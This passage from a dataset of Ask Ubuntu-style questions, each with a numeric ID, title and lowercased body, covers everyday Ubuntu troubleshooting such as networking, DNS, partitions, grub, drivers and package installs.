18:39 sound - > ../linux-headers-2.6.32-21/sound lrwxrwxrwx 1 root root 26 2013-03-25 18:39 source - > /build/buildd/linux-2.6.32 lrwxrwxrwx 1 root root 32 2013-03-25 18:39 tools - > ../linux-headers-2.6.32-21/tools lrwxrwxrwx 1 root root 33 2013-03-25 18:39 ubuntu - > ../linux-headers-2.6.32-21/ubuntu lrwxrwxrwx 1 root root 30 2013-03-25 18:39 usr - > ../linux-headers-2.6.32-21/usr lrwxrwxrwx 1 root root 31 2013-03-25 18:39 virt - > ../linux-headers-2.6.32-21/virt output of : uname -r 2.6.32-21-generic how should i fix this ? ( i want the headers files without broken links ) .
272238	how can i install the sap gui ?	i want to install sap gui on ubuntu 12.10 . if it is possible then guide me how i can do it and if you have sap gui for java then feel free to add it to your answer .
272241	autokey prints strange bs characters in pgadmin3 on ubuntu	i 'm using autokey 0.90.1 on ubuntu 12.10 . i would like to use autokey in pgadminiii ( 1.14.2 ) . i have the following defined ( abbreviation - > phrase ) : ts - > test phrase number one ! tst - > test phrase number two ! if i use this in gedit , i get correct results . if i use the same in pgadmin query window , i get only strange bs in rounded black box . i guess this is some special character , maybe backspace ? i did not make any custom setting , using autokey defaults . is there any known bug causing this behaviour or am i doing something wrong ?
272245	python-scipy test freeze in ubuntu 12.04	i have a new installation of ubuntu server 12.04 lts . running the test of python-scipy failed to go through and stopped as the display below . scipy.test ( ) running unit tests for scipy numpy version 1.6.1 numpy is installed in /usr/lib/python2.7/dist-packages/numpy scipy version 0.9.0 scipy is installed in /usr/lib/python2.7/dist-packages/scipy python version 2.7.3 ( default , aug 1 2012 , 05:14:39 ) [ gcc 4.6.3 ] nose version 1.1.2 this happens to my another installation of xubuntu 12.04 as well . how can i get the problem resolved ? thanks in advance . update : it is related to autofs . removing autofs resolved the issue .
272246	bootable usb hard drive question ( mac )	i followed every step on `` how to create a bootable usb stick on os x ? '' it works fine according to the instruction until the last step . when i restart my mac , i only get two disks to boot from my `` macintosh hd '' and `` recovery 10.2 '' , there 's no usb flash drive to choose from . what do i do ?
272248	processing triggers for man-db	when running sudo aptitude upgrade , the console freezes for long after almost every package upgrade with a message `` processing triggers for man-db ... '' . what could be the problem and how can i fix it ? ubuntu version : 12.04 ( both server and xubuntu ) thanks in advance . update : it looks like this problem is related to package autofs upon my further tests . removing autofs resolved the issues . no idea why . i then have to use soft links instead of autofs for my file system to avoid this issue ( and other two issues posted here as well ) .
272250	networking problem on ubuntu 11.10 dell vostro 3360	i purchased a pre- installed ubuntu 11.10 dell vostro 3360 . i tried to connect to wifi at home which i was able to without any problem . in my office i looked forward to connect to the wifi and it shows that there are no network devices available . i also can see a message `` the system network services are not compatible with this version '' when i open the network window from the system settings . is this a observed problem . how can i solve this ? ?
272251	dirscancb problem show in log file	in the log file of my ubuntu 12.04 installation , there are long list of log entries as below : rpc.idmapd [ 818 ] : dirscancb : open ( /run/rpc_pipefs/nfs/clntfa ) : no such file or directory rpc.idmapd [ 818 ] : dirscancb : open ( /run/rpc_pipefs/nfs/clntfb ) : no such file or directory what is wrong with my installation ? how to revolve the issue ? thanks in advance .
272257	why 's ubuntu 12.10 so fast	i switched from windows to ubuntu . there 's a question in my mind regarding to boot up time of windows and ubuntu ( and many other linux distros like fedora , linux mint etc. ) . the question is `` how come linux boot so fast ( 10 secs ) compared to windows which takes 30-40 secs ? '' i would like to know that what are the factors that decide boot up time and what 's the speciality of ubuntu 12.10 that makes it this fast ( in booting process ) .
272267	how do i to copy files to flash drive in a recovery mode ?	it seems like to deleted too much files by rm -r and now i have the error of `` the system is running a low-graphic mode '' in ubuntu and i have to work in windows because of that . however i can load it in recovery mode . i need to copy the files from downloads folder to a flash drive . downloads folder has them as i can see by ls command . when i plug in a flash drive , there will be some messages saying that everything is ok ( as i understood ) and it 's plugged . but when i go to /media/my_name and do ls then i do n't see anything . i do n't see anything in /run/media/my_name either ( i 'm not sure if should though ) . i ca n't connect to the internet for some reason . ubuntu was installed by wubi.exe file . how do i save the content of my downloads folder to a flash drive ?
272269	how to distribute internet speed equally	hi i am using adsl on my internet cafe and is there any way that i can distribute internet speed equally in all computers , is there any program for linux ( ubuntu ) and windows as well control and distribute internet speed referring to download/upload speed . for example internet speed is controlled by a server / proxy or main computer clients have there quota of speed equally for all clients
272274	how to install javascript eclipse platform on ubuntu	i sudo apt-get install eclipse installed eclipse on my ubuntu 12.0.4 server , by checking i found it is a classic platform . so , how can i make it as a javascript ide ? i followed http : //marketplace.eclipse.org/marketplace-client-intro , but the page said there is no market place for classic platform . so , could you help me this out ? i am a beginner of ubuntu .
272278	unity stuck on autohide ?	i 've had the auto-hide behavior turned on on my ubuntu 12.10 machine for some time now , but whenever i try to turn auto-hide off , it resets itself to on . ( i.e . if i turn it off , it will switch right back to on while i 'm looking at it ) i 've tried this through unity tweak , ubuntu tweak , system settings , and the compiz config tool , but i 've had no luck . has anyone else had this problem ?
272280	disable three finger tap of apple trackpad in ubuntu 12.04	i have configured apple trackpad on ubuntu 12.04 in xorg.conf as suggested here . i have also added '' tapbutton3 '' `` 0 '' but it does not disable three finger tap . my question how to disable three finger tap of trackpad in xorg.conf ?
272284	why does a `` extract here '' context menu work incorrectly ?	i 'm a beginner in linux . i extracted a android-ndk-r8e-linux-x86.tar.bz2 in downloads directory with a `` extract here '' context menu . and i executed `` ndk-build '' command . then i got an error message like below . ndk-build arm-linux-androideabi.gcc : command not found . i found that file does n't exist . so , i extract manually in a terminal like below . tar -xvjf android-ndk-r8e-linux-x86.tar.bz2 . now , it works correctly , because arm-linux-androideabi.gcc file is correctly extracted . why does that difference occur ? does a `` extract here '' context menu do invalid action , or do i misuse the tool ? thanks for your answer , jackweirdy , eliah kagan . but my problem is not about the path . for example , `` extract here '' does n't make a arm-linux-adnroideabi.gcc file . but `` tar '' make a arm-linux-androideabi.gcc file . when i used `` extract here '' , it extracted below files in the directory . arm-linux-androideabi-addr2line arm-linux-androideabi-c++filt arm-linux-androideabi-cpp arm-linux-androideabi-elfedit arm-linux-androideabi-g++ arm-linux-androideabi-gcc-4.6.x-google arm-linux-androideabi-gcov arm-linux-androideabi-gdb arm-linux-androideabi-gdbtui arm-linux-androideabi-gprof arm-linux-androideabi-readelf arm-linux-androideabi-run arm-linux-androideabi-size arm-linux-androideabi-strings but when i used `` tar '' , it extracted below files in the directory . arm-linux-androideabi-addr2line arm-linux-androideabi-ar arm-linux-androideabi-as arm-linux-androideabi-c++ arm-linux-androideabi-c++filt arm-linux-androideabi-cpp arm-linux-androideabi-elfedit arm-linux-androideabi-g++ arm-linux-androideabi-gcc arm-linux-androideabi-gcc-4.6.x-google arm-linux-androideabi-gcov arm-linux-androideabi-gdb arm-linux-androideabi-gdbtui arm-linux-androideabi-gprof arm-linux-androideabi-ld arm-linux-androideabi-ld.bfd arm-linux-androideabi-ld.gold arm-linux-androideabi-nm arm-linux-androideabi-objcopy arm-linux-androideabi-objdump arm-linux-androideabi-ranlib arm-linux-androideabi-readelf arm-linux-androideabi-run arm-linux-androideabi-size arm-linux-androideabi-strings arm-linux-androideabi-strip i ca n't understand why `` extract here '' can not extract all files .
272286	how to remove or recover password from a libreoffice document	i have 2 old documents in odt format that i either made a typo or forgot the actual password for them . i want to recover the password or simply remove it . what steps ( if available ) are there to remove such password ( and remind me of not put passwords to documents ) .
272289	after disabling dpms , how to keep dpms disabled after resume from suspend ?	ubuntu 12.10 quantal : on login , i run `` xset -dpms s 0 0 s off '' . this works great until i suspend and resume . for some reason , dpms is re-enabled after resume . is there an easy way to completely disable dpms without recompiling x ?
272295	unity gone after upgrading kernel	i recently got an automatic software update where i was alerted that there was insufficient space on /boot . attempting to purge old kernel versions following this answer , i accidentally removed also the current version . i reinstalled it and rebooted , but now the unity bar and all window title bars are not showing . any ideas why ? see recent dpkg.log . update : see output of unity . there 's something about opengl in there but i do n't know what to make out of it .
272298	ca n't access windows 7 partition and blkid crashes when i try	i found nothing about this specific problem on the internet so i 'm asking for help here : once i had windows 7 and ubuntu on dual boot working flawlessly . then i bought a new internal 1 tb hd and decided to install win 7 and ubuntu on it . i followed these steps after plugging the new hd ( thus having two hds ) : with win7 installation dvd : on my new internal hd ( 1tb ) i created 3 primary mbr partitions formatted as ntfs and left some free space to later install ubuntu . ( 1st partition with 200 gb for windows , 2nd and 3rd with 300 gb each to keep media and other documents , and 200 gb of free space ) . i installed win7 ultimate on the first partition ( 200 gb ) without problems , transfered my media files to 2nd and 3rd partitions and formatted my old hd ( which has 250 gb ) . then i inserted ubuntu live cd to install it and rebooted as it demanded : the machine booted with live cd but when i got the choose-what-to-do installation screen , it did n't show me the option to `` install alongside windows '' . there was only two options , `` install ubuntu '' and `` something else '' . i chose `` something else '' and followed till the partitions-handling screen . this screen did show all 3 primary ntfs partitions with correct sizes and the unpartitioned space . then i created 3 logical partitions on the free space ( one for / , other for /home and other for swap ) and chose to install bootloader on the hd ( not on any particular partition ) . after finished the installation process i rebooted as normal and , as i already suspected that could happen , the machine booted directly onto ubuntu . as the installer did n't recognize the win7 installation , there was no entry for it on grub2 . then , more odd , when i opened nautilus , the 2nd and 3rd ntfs partitions with my media files were there for me to mount and access ( and i did access them without problems ) , but the win7 partition simply was n't there . the same happened on dolphin and krusader when i tried them . still odd , disk utility does show win7 partition and shows that it is ntfs and has a bootable flag , but under `` usage : '' , where other partitions say `` filesystem '' it shows only a `` - '' , no label ( or `` unknown '' on the graphical representation of the disk ) and no possibility to mount . i then opened terminal and tried `` sudo blkid '' , and got no return but a popup saying that blkid has crashed . on the details of the message , the title of the message is blkid crashed with sigsegv in blkid_do_safeprobe ( ) '' , the segvreason says `` reading unknown vma and the segvanalysis says : segfault happened at : 0x7fa9ac7e17b6 : mov 0x4 ( % rsi ) , % eax pc ( 0x7fa9ac7e17b6 ) ok source '' 0x4 ( % rsi ) '' ( 0xfffffffffa1e8c4c ) not located in a known vma region ( needed readable region ) ! destination `` % eax '' ok oddly enough , when i tried sudo fdisk -l it did show a list of all partitions correctly , including the 1st ntfs partition with correct size , boot flag , but no mount point and nothing about it having windows on it . i rebooted the machine several times , and whenever i open any program that calls blkid i get this popup saying that blkid crashed , for example , `` ntfs configuration tool '' , `` mountmanager '' and sometimes even the native ubuntu updater makes blkid crash in the middle of the update , although the overall update process never stalled . also , when i try to mount that partition on terminal using `` mount '' command ( with or without sudo ) , it returns that i do n't have permission to do that , even though i am the only user and it 's an administrator account . after all that , i still had to do some tweaks to be able to boot on my windows7 ( restore windows bootloader and , on windows , use easybcd to add an ubuntu entry on the win bootloader 'cause i do n't know how to edit grub2 manually and even if i did , i 'm not sure it would work given the situation ) . to try one last thing , i formatted and excluded the logical partitions where ubuntu was and reinstalled ubuntu on that old 250 gb hd i still have . but the results were exactly the same . here 's what sudo fdisk -l returns ( sda is aa third hd i did n't mentioned cause it only has some old files and no os . windows is on sdb1 and ubuntu is now on sdc ) : disk /dev/sda : 120.1 gb , 120060444672 bytes 255 heads , 63 sectors/track , 14596 cylinders , total 234493056 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3d8a3d8a device boot start end blocks id system /dev/sda1 2048 234489855 117243904 7 hpfs/ntfs/exfat disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x1b8c281d device boot start end blocks id system /dev/sdb1 * 2048 419432447 209715200 7 hpfs/ntfs/exfat /dev/sdb2 419432448 1048578047 314572800 7 hpfs/ntfs/exfat /dev/sdb3 1048578048 1677723647 314572800 7 hpfs/ntfs/exfat disk /dev/sdc : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x7d822705 device boot start end blocks id system /dev/sdc1 * 2048 70596607 35297280 83 linux /dev/sdc2 70598654 183271423 56336385 5 extended /dev/sdc5 70598656 175458303 52429824 83 linux /dev/sdc6 175460352 183271423 3905536 82 linux swap / solaris the only thing i did n't try was to format windows and install it on the old hd because i already have too many things set up on windows and to reinstall it would be too laborious . searching internet for this problem , i only found one similar problem , but i 'm not sure it 's the same situation i have : there 's a ( long inactive ) bug report from a guy that could n't access his external hd and blkid crashed whenever he tried . but on that case , besides being an external hd , that guy seemed to have no os installed on it . and on my case , it seems that the presence of windows is what 's preventing access to the partition since all other partitions are perfectly accessible . can anyone tell me what 's wrong ?
272299	vlc installation on lucid	environment : lucid lynx ( ubuntu 10.04 ) i had installed vlc 1.0.6 using the following : % sudo add-apt-repository ppa : lucid-bleed/ppa % sudo apt-get update % sudo apt-get install vlc vlc-plugin-pulse mozilla-plugin-vlc after a month or so , while updating via command line , i got a notification stating a lot of packages were automatically installed and hence i should uses apt-get -- autoremove which i used . now vlc was uninstalled in this . and now when i try to install vlc back , i getting the following error : root @ srihari-laptop : ~ # apt-get install vlc reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 1.1.13-1~ppa1~lucid1 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 1.1.13-1~ppa1~lucid1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 1.1.13-1~ppa1~lucid1 ) but it is not going to be installed e : broken packages i have tried to do every thing possible including purging the packages but that did n't work out . i need vlc to work . please let me know how do i fix this .
272309	how do i open a .py file in the interpreter ?	i do n't know how to open a .py file in the interpreter . when i double click it , it opens in gedit . can you help ?
272310	retrieving files from broken wubi installation	my wubi installation of ubuntu 12.04 is stuck in an infinite login screen loop . i have tried following the advice on other posts but nothing has worked so now i 'm trying to retrieve a few files from root.disk from windows7 . here is what i have tried : i booted into ubuntu and when faced with the login screen ctrl+shift+f1 and logged in with that . updated all my packages and tried to log in the usual way again . no dice . i logged in that way again and tried to copy some files over to /media/data ( this is a general purpose windows-friendly storage partition ) . permission denied . sudo does n't work and su wont accept my password . i got into recovery mode root and opened up /media/data . ls tells me that it is empty ( it is not ) . i made a new folder for my backups . this new folder shows up with ls . cp started the copy without complaint but then i ran out of disk space on data . i booted into windows and the backups directory is n't where i left it and i have loads of space left . back in recovery mode the backup folder is still visible but nothing else on data is ... spooky . my next approach was to find something that i could use to open up root.disk via windows . i have seen lots of recommendations for programs on this forum but they either dont work on windows7 , only have corrupted versions available for download , or just wont open the .disks as is . so my question is : how can i make data stored in a wubi disk image available to windows7 ?
272313	how to read file with iso-8859-1 latin1 encoding ?	what package should i install to be able to read files with iso-8859-1 latin1 encoding ? currently , i only see strange characters instead of text . % locale lang=en_us.utf-8 language= lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all=
272314	setup and install intellij with jdk	is there any scripts for downloading and installing intellij with javajdk or openjdk ? i do n't know how i did it before using ubuntu 12.10 but i 'm now on a fresh 13.04 install and i have been looking around for an all in one script , or some scripts i can cobble together i have the two links detailed that i think will be handy , can anyone else add to this please ? how do i install oracle java jdk 7 ? install oracle java 7 in ubuntu via ppa repository update : i have now found you can install intellij through the ubuntu software centre , so although this was a nice learning exercise for me it 's not really relevant any more . thanks to everyone that contributed .
272323	is there a way to burn ubuntu on a cd rom ?	i was trying to install ubuntu on an older laptop which does n't have a dvd rom or a usb boot capabilities . is there an option to burn the image files to a cd rom ? i am pretty sure that the size of the image file may be slightly larger to fit on a cd rom . is there a way to split the image files and use two cd roms instead ?
272324	any idea what type of error this is - machine check / kernel panic	i have been getting the following problem running ubuntu 12.10 . basically , it freezes completely , does n't respond to keyboard or mouse , caps wo n't change and alt+sys req+reisub does n't do anything . the problem is consistent in that after a hard reset it will be fine for a while but will freeze at some point . i 've tried booting from a startup usb and this also froze so it is n't a os problem , some hardware issue . today i got the following messages before it froze . i guess what i want to find out is which hardware component is failing ? this is my laptop http : //www.amazon.com/sony-vaio-series-vgn-ns305d-notebook/dp/b002f1psq8 intel core 2 duo processor t6670 2.2 ghz 2mb l2 cache , 800mhz fsb speed 2gb ddr2-800 ram max - 4gb 160gb ( 5400rpm ) sata hard drive [ hardware error ] : cpu 0 : machine check exception : 4 bank 5 : f200141014040400 [ hardware error ] : tsc zc124d6zdd [ hardware error ] : processor 0 : 1067a time 1364221737 socket 0 apic 0 microcode a07 [ hardware error ] : run the above through 'mcelog -- ascii' [ hardware error ] : cpu 1 : machine check exception : 5 bank 0 : f200084000000800 [ hardware error ] : rip ! inexact ! 10 : < ffffffff81031f8f > { mwait_idle_with_hints +0x5f/0x80 } [ hardware error ] : tsc zc124d70df [ hardware error ] : processor 0 : 1067a time 1364221737 socket 0 apic 1 microcode a07 [ hardware error ] : run the above through 'mcelog -- ascii' [ hardware error ] : cpu 1 : machine check exception : 5 bank 5 : f2001410300c0400 [ hardware error ] : rip ! inexact ! 10 : < ffffffff81031f8f > { mwait_idle_with_hints +0x5f/0x80 } [ hardware error ] : tsc zc124d70df [ hardware error ] : machine check : processor context corrupt kernel panic - not syncing : fatal machine check panic occurred , switching back to text console rebooting in 30seconds .. acpi memory or i/o reset_reg . acpi memory or i/o reset_reg .
272332	where do deb packages install to	i installed a deb package via the commandline like this : sudo dpkg -i dbeaver_2.1.0_i386.deb i want to install some drivers for the software and to do so i need to place them in the root directory of the application , so where did the package install to ?
272337	toshiba satellite s855 & ubuntu 12.10 & radeon hd 7600m issues	i just got a toshiba s855 ( i7-3630qm ) machine , with windows 8 pre-installed , and have been through a nightmare to make it work alongside ubuntu 12.10 . making it dual boot was not the issue , after i found the proper instructions on how to deal with the uefi stuff . the problem came after having it boot into ubuntu ; at first the os booted fine , but after installing the recommended updates , the screen just went crazy ; only a small frame at the top , flickering , and no access to text-mode screens either . after booting into recovery mode , i found that x was reporting a problem accessing the ati card 's vbios , resulting in a 'no screen found ' error . i tried nearly everything i found around ... removing fglrx* ; reinstalling the linux headers after or before fglrx ; used the ati drivers ; used the opensource drivers ; to no avail . after 3 or 4 reinstallations , i found that the issue is being caused by the latest kernel image suggested by the update manager . the usb image i used for installing came with 3.5.0-17 , and the update manager suggested 3.5.0-26 . so what i did was to lock the former version in synaptic , applying all updates but the kernel update , and ubuntu is working like a charm now . i 'm aware that maybe having an outdated kernel is not the best solution , but it was the only way i found to make it work . so , can anyone out there confirm that there are issues with the latest suggested kernel updates and ati radeon cards ? the ( horrible ) downside on toshiba machines is that the built-in intel gpu is not accessible , so no way of switching over to intel graphics . is there an easy way to go back to a previous kernel image after reinstalling a new one ? i know that old entries are kept in grub , but in my case , after installing 3.5.0-26 , even booting into 3.5.0-17 did not worked well ... same screen freeze issue . how can i know if 13.04 will break my install ? any light on this will be appreciated .
272340	upgrading from 12.04 to 12.10	i have a bootable disk of 12.10 and currently system is running 12.04 i am looking for a method where i upgrade to 12.10 without loosing data by bootable disk
272343	recording sounds straight from sound card	i 'm trying to record sounds straight from my sound card . i 've found tutorials telling me to download pulseaudio video control and , in the `` recording '' tab , make sure that i am recording from `` monitor of internal audio analog stereo '' . however , i ca n't find any options for this . i 've only `` built-in audio analog stereo '' . i 'm guessing this is a hardware issue but is there any chance there is just some driver i have to download ? are there any other options for me to be able to record sounds straight from my sound card ?
272349	how to take a screenshot on ubuntu touch	i have flashed ubuntu touch on my motorola razr gsm ( umts_spyder ) , and would like to take screenshots , but i do n't know how . is there a way to do that ?
272351	how to mount apple core storage partition	so i wiped my mac mini ( os x lion ) and replaced the os with ubuntu 12.04.2 . so far so good , it works beautifully . but i 'd like to still access the external backup drive 's time machine contents . the drive was untouched during the install of ubuntu . it 's just an external 1tb usb drive . problem is , the partition type is af05 ( apple core storage ) and not hfs+ . is there a way to mount this in linux or am i stuck with having to find another mac to do the data restore ? here 's the relevant disk layout info : gpt fdisk ( gdisk ) version 0.8.1 type device filename , or press < enter > to exit : /dev/sdb partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . command ( ? for help ) : p disk /dev/sdb : 1953525165 sectors , 931.5 gib logical sector size : 512 bytes disk identifier ( guid ) : 44a9e054-abba-4788-8d47-d473709370cb partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1953525131 partitions will be aligned on 8-sector boundaries total free space is 10 sectors ( 5.0 kib ) number start ( sector ) end ( sector ) size code name 1 40 409639 200.0 mib ef00 efi system partition 2 409640 1953262983 931.2 gib af05 timemachine 3 1953262984 1953525127 128.0 mib ab00 booter 0x43773a38 and what i 'd like to get at is that timemachine partition , /dev/sdb2 . is there any hope ?
272352	how to manage partition for setup ubuntu 12.10 ?	i want to setup ubuntu but i do n't know how to manage partition , i just know that i have to create a swap , ex4 and home partition but i do n't know how to create this partition ? what type of partition do i need for setup ubuntu , primary or logical ?
272353	problems maintaining interent connection with static ip	i have been attempting to set up ubuntu 12.04 with a static ip ( with information provided by my university ) as well as the local cycling ip on a workstation with two ethernet ports . however , i 've had some nagging issues , and in my attempts to fix thing , i appear to have made them worse . at the moment the internet connection keeps droping out and only a command of : $ sudo /etc/init.d/networking restart seems to allow for reconnect . here is some output of my configuration : $ more /etc/network/interface file : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp iface eth1 inet static address 169.230.xx.zz gateway 169.230.xx.y netmask 255.255.255.0 network 169.230.xx.a broadcast 169.230.xx.255 dns-nameservers 169.230.ab.cd 128.218.def.ghi then my ifconfig out : $ ifconfig eth0 link encap : ethernet hwaddr 00:25:90:99 : d4 : be inet addr:169.230.xx.xxx bcast:169.230.xx.255 mask:255.255.255.0 inet6 addr : fe80 : :225:90ff : fe99 : d4be/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4135511 errors:0 dropped:9 overruns:0 frame:0 tx packets:375971 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:530705260 ( 530.7 mb ) tx bytes:103589902 ( 103.5 mb ) memory : dfd20000-dfd40000 eth1 link encap : ethernet hwaddr 00:25:90:99 : d4 : bf inet addr:169.230.xx.yyy bcast:169.230.xx.255 mask:255.255.255.0 inet6 addr : fe80 : :225:90ff : fe99 : d4bf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1351335980 errors:0 dropped:6 overruns:0 frame:0 tx packets:672022745 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1830620673517 ( 1.8 tb ) tx bytes:56632610611 ( 56.6 gb ) memory : dfd00000-dfd20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3986514 errors:0 dropped:0 overruns:0 frame:0 tx packets:3986514 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1147973416 ( 1.1 gb ) tx bytes:1147973416 ( 1.1 gb ) now , i also see this nice message pop up in terminal from time to time : lockfile creation failed : exceeded maximum number of lock attempts now , i think the problem as something to do with resolv.conf file not populating correctly . here is what i see : $ more /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 128.218.zzz.10 nameserver 128.218.zzz.40 search ucsf.edu any idea about what is possibly happening would be great . thanks in advance .
272358	extrememly slow dns lookup	ubuntu 12.10 i 'll explain the first problem . sometimes when i load a webpage it never finishes loading and it says can not reach server or something like that . when i ping that website , the terminal says it can not resolve the hostname . so i then tried google 's dns servers but had no luck there . it 's weird because i 've never had this problem in windows 7 . i used cat /etc/resolv.conf and it came up with this : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 search hsd1.or.comcast.net why would it use 127.0.1.1 ? does that mean it 's trying to resolve addresses locally ? when i ping the comcast search server i get a timeout error .
272363	error reporting	i am relatively new to ubuntu ( have installed 12.1 on my desktop ) . there are certain software updates done by ubuntu automatically without asking for password recently . every now and then it now prompts me that `` some errors have occurred '' and asking me to report by entering my password . is this a normal behavior or some malicious software at work ?
272364	openoffice wo n't start	i click on the shortcut and nothing happens . this goes for all openoffice programs . i 've even tries to launch the exe directly . none of the openoffice modules will start on my computer . i can open the files just fine on another computer , so i know it 's not the network or the file . any suggestions ?
272365	transparency bug in the dash	i 'm using ubuntu 12.10 on my laptop acer aspire 5742zg with an optimus nvdia card ( bumblebee is running perfectly ) and i have a problem with the transparency in the dash . when i open the dash all the launcher become black without transparency . i tried to select the active blur and static blur with compiz but nothing change !
272369	ldconfig : path `/lib/x86_64-linux-gnu ' given more than once	i 'm running 12.10 . i 'm trying to run an application that needs libglut.so.3 . i installed freeglut3 and i can see the library located in /usr/lib/x86_64-linux-gnu . but when i run the application , it tells me that it ca n't find the library . when i run ldconfig -v | grep glut i get /sbin/ldconfig.real : path `/lib/x86_64-linux-gnu ' given more than once /sbin/ldconfig.real : path `/usr/lib/x86_64-linux-gnu ' given more than once libglut.so.3 - > libglut.so.3.9.0 what does it mean when it says the path is given more than once , and does this have anything to do with why the application ca n't find the library ?
272370	how to run dual operating systems , windows 7 primary , ubuntu secondary	i know how to install two operating systems , but the problem is , i only know how to set it up in a way that requires me to reboot the machine , and selecting an os to boot up . so pretty much only one operating system can be actively used at a time . i would like to run windows 7 as the primary operating system , with ubuntu as the secondary operating system . ubuntu and windows 7 both need to be running 24/7 in parallel . there 's just no reason for me to run a web server on any other platform than linux , however , i need to be able to use windows 7 for work and other miscellaneous programs . what is the best route for me to take so that i can install ubuntu linux , so that it 's always running , while still allowing me to run windows 7 simultaneously ? oh , as a side note , i also occasionally play video games , so i would like it if windows 7 ran smoothly . i 've had a terrible experience with wine in the past , but if that 's what 's recommended , i guess i 'll use that then . i 'm sure it 's hard to formulate a real concrete answer , but any information to guide me in the right direction would be much appreciated .
272372	lost path variable content	i was trying to add something to the path with : export path=/user/home/sbt/bin but i removed all of the content of path and i can not run any command on the terminal even ls ! so what should i do ? can i fix it ?
272377	unknown filesystem grub rescue error	i use only ubuntu . when i turned on my laptop today , it says grub rescue . i tried ls command which returned me ( hd0 ) , ( hd0 , msdos5 ) , ( hd0 , msdos1 ) . i tried ls ( hd0 ) , ls ( hd0 , msdos5 ) and ls ( hd0 , msdos1 ) . but all the three said unknown filesystem . hence i could not set root and prefix . please help me with this . p.s : its not a dual boot system . i have only ubuntu 12.10 .
272380	how do i run the ubuntu phone nexus7 image in a vm ?	do i need to go through the device imaging steps with an adt vm , a specific qemu configuration , something else , not possible ? how do i run the ubuntu phone nexus7 image in a vm ? any of the above options would be okay . i 'm just looking for a definitive answer .
272383	how can i uninstall kdevelop from ubuntu ?	i want to uninstall kdevelop from ubuntu . it was not possible to create , debug and compile c programs , only c++ .
272385	how to activate my lens on quantal ?	how to enable/activate any unity lens on quantal ? i installed many unity lens on quantal , using the following command , but none is active on dash . sudo apt-get install unity-lens-wikipedia sudo apt-get install unity-lens-askubuntu sudo apt-get install unity-lens-help sudo apt-get install unity-lens-utilities sudo apt-get install unity-lens-answer pressing super it shows only app/file/music/video lens .
272387	ubuntu ext2 partitionen	english and german written , i used windows partition manager to do away 2 ubuntu partitions or 1 ubuntu and 1 windows nt . i used `` delete volume '' . what i did n't say is put it together with my working ubuntu partition but it did it and declared it as fat32 in windows . on ubuntu with partition managers it is visible as ext2 . there was no formatting of the 2 20 gb partitions . windows just putted it together . i tried testdisk , gparted , and some others . with the explorer i can see only a directory from the windows partition as my ubuntu so it does n't show me my ubuntu it shows me what it declared to the new partition . i 'm sure my data is still there but unpointed . does anybody know how to seperate these partition without loosing data . german . ich habe in windows den partition manager benutzt um 2 ubuntu partitionen oder 1 ubuntu und 1 nt partition zu löschen . benutzt habe ich `` volume löschen '' . was er getan hat ist diese 2 partitionen mit meiner funktionierenden ubuntu partition zusammenzuführen und als fat32 partition zu deklarieren . auf ubuntu sieht man die fat32 als ext2 nur sind 2 20 gb partitionen jetzt mit 100 gb 140 geworden und es gab kein formatieren der 2 partitionen bevor sie unfreiwillig mit der 3ten zusammengelegt wurden . weiß jemand wie man diese 3 partitionen auseinanderführen kann oder sich für eine der 3 entscheidet in dem man sie browsable macht . thanks , ciao marko
272388	ctrl-f opens terminal	i have somehow set ctrl+f to open xterm terminal ( not my default ) . i tried finding the configuration in dconf , but i did n't find anything mentioning keyboard shortcuts , except one custom column with `` command1 '' to some number , but it did n't have anything with ctrl+f . how do i change back ?
272392	can i redistribute a custom ubuntu-based distro for a profit ?	i know that i can legally modify ubuntu , but is it legal to redistribute an operating system that 's based on ubuntu for a small profit ? i want to know this before i get started on my ubuntu-based linux distro .
